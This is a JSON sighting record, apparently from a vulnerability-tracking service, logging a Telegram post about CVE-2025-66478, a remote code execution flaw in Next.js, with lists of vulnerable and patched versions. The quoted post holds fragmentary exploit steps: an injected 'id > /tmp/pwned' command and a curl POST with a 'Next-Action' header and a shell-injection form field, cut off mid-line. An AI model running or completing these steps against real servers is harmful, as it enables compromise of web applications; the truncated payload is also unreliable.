{"uuid": "c8cedc76-a5a7-4d70-984f-0c0366a8cc86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/nanvalue/292", "content": "Remote code execution (RCE) vulnerability exploit in Next JS \n\nCVE-2025-66478\n\ncommand=\"id &gt; /tmp/pwned\"\n\ncat &gt; payload.json &lt; payload2.txt\n\nThen\ncurl -X POST http://localhost:3000 -H \"Next-Action: dontcare\" \\\n    -F \"0=/dev/null || true\nVulnerable versions of Next.js that embed a vulnerable React component are:\n\n15.x\n16.x\n14.3.0-canary.77 and later canary releases\nPatched versions are:\n\n15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7\n16.0.7", "creation_timestamp": "2025-12-08T23:06:08.000000Z"}